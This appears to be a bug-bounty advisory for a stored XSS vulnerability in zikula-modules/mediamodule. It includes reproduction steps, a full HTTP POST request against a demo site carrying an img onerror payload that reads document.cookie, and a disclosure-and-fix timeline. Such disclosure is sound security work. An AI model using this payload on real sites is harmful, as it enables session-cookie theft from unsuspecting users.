Cross-site Scripting (XSS) - Stored in zikula-modules/mediamodule

Valid

Reported on

Sep 18th 2021


Description

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites.

Proof of Concept

// PoC.js

Steps to reproduce :

1 --> Go to link --> https://demo.ziku.la/media/media/create/paste/url
2 -->  Inject [Payload ] in Description input and Click Save


#HTTP POST Request :

POST /media/edit/root/example-collection/f/xss-img-src-x-onerror-alert-document-cookie HTTP/2
Host: demo.ziku.la
Cookie: _zsid=a9b37grip4in2kp0j6kaugdvrh
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 762
Origin: https://demo.ziku.la
Referer: https://demo.ziku.la/media/edit/root/example-collection/f/xss-img-src-x-onerror-alert-document-cookie
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

cmfcmfmediamodule_media_urltype%5Bversion%5D=1&cmfcmfmediamodule_media_urltype%5Bcollection%5D=3&cmfcmfmediamodule_media_urltype%5Btitle%5D=test&cmfcmfmediamodule_media_urltype%5Bdescription%5D=xss%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&cmfcmfmediamodule_media_urltype%5Blicense%5D=CC-BY-NC-4.0&cmfcmfmediamodule_media_urltype%5Bauthor%5D=&cmfcmfmediamodule_media_urltype%5BauthorUrl%5D=&cmfcmfmediamodule_media_urltype%5BauthorAvatarUrl%5D=&cmfcmfmediamodule_media_urltype%5BmediaType%5D=&cmfcmfmediamodule_media_urltype%5BextraData%5D=%5B%5D&cmfcmfmediamodule_media_urltype%5Burl%5D=https%3A%2F%2Frniiam114sya5x58a9oqz587jypodd.burpcollaborator.net%2F&cmfcmfmediamodule_media_urltype%5B_token%5D=7cRJw8PfyS7VA2qPLrVm6qDJAWbvpclhKqEwk3EBs94

Impact

This vulnerability is capable of...

We have contacted a member of the zikula-modules/mediamodule team and are waiting to hear back 2 months ago
Axel Guckelsberger validated this vulnerability 2 months ago
0x9x has been awarded the disclosure bounty
The fix bounty is now up for grabs
Axel Guckelsberger confirmed that a fix has been merged on a91ad1 2 months ago
Axel Guckelsberger has been awarded the fix bounty